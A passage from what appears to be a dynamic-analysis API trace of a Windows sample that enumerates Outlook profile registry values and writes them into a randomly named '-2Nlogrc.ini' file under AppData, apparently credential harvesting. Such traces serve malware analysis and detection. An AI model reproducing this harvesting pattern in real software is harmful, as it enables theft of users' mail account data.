DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.938] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.938] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.938] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.938] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x10, ByteOffset=0xdd5fc*=1028, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.939] NtClose (Handle=0x38c) returned 0x0 [0279.940] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.940] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.941] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2b60) returned 1 [0279.941] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.941] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x2e, ByteOffset=0xdd5fc*=1044, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.941] NtClose (Handle=0x38c) returned 0x0 [0279.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.943] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.943] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0279.943] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.943] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0xbc, ByteOffset=0xdd5fc*=1090, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.943] NtClose (Handle=0x38c) returned 0x0 [0279.946] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.946] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.946] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.946] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3358) returned 1 [0279.946] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.946] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x30, ByteOffset=0xdd5fc*=1278, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.946] NtClose (Handle=0x38c) returned 0x0 [0279.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.948] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.948] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.948] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.948] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1c, ByteOffset=0xdd5fc*=1326, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.949] NtClose (Handle=0x38c) returned 0x0 [0279.955] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0xd, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.955] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.955] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.956] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0279.956] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.956] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x20, ByteOffset=0xdd5fc*=1354, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.956] NtClose (Handle=0x38c) returned 0x0 [0279.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.958] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.958] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b30b0) returned 1 [0279.958] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.958] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x14, ByteOffset=0xdd5fc*=1386, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.959] NtClose (Handle=0x38c) returned 0x0 [0279.960] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0xe, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x8000001a [0279.960] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd71c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.960] NtCreateFile (in: FileHandle=0xdd73c, DesiredAccess=0x12019f, ObjectAttributes=0xdd704*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd724, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd73c*=0x38c, IoStatusBlock=0xdd724*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.960] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0279.960] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd724, FileInformation=0xdd67c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd724, FileInformation=0xdd67c) returned 0x0 [0279.960] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd724, Buffer=0x58c868*, Length=0x4, ByteOffset=0xdd694*=1406, Key=0x0 | out: IoStatusBlock=0xdd724, Buffer=0x58c868*) returned 0x0 [0279.960] NtClose (Handle=0x38c) returned 0x0 [0279.961] NtClose (Handle=0x254) returned 0x0 [0279.961] NtEnumerateKey (in: KeyHandle=0x250, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x0 [0279.962] NtCreateKey (in: KeyHandle=0xde3cc, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3cc*=0x254) returned 0x0 [0279.962] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.962] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.962] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.962] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.962] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0xc, ByteOffset=0xdd5fc*=1410, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.962] NtClose (Handle=0x38c) returned 0x0 [0279.964] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.964] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.964] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2f18) returned 1 [0279.964] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.964] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x52, ByteOffset=0xdd5fc*=1422, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.965] NtClose (Handle=0x38c) returned 0x0 [0279.965] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.965] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.965] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.966] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.966] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.966] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x12, ByteOffset=0xdd5fc*=1504, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.966] NtClose (Handle=0x38c) returned 0x0 [0279.980] RtlIntegerToChar (in: Value=0x3c53db58, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="1012128600") returned 0x0 [0279.980] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.980] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.980] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.980] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.981] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=1522, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.981] NtClose (Handle=0x38c) returned 0x0 [0279.982] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.982] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.982] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.983] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.983] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=1546, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.983] NtClose (Handle=0x38c) returned 0x0 [0279.984] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.984] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.984] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.984] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.984] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x14, ByteOffset=0xdd5fc*=1570, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.984] NtClose (Handle=0x38c) returned 0x0 [0279.985] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.985] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: 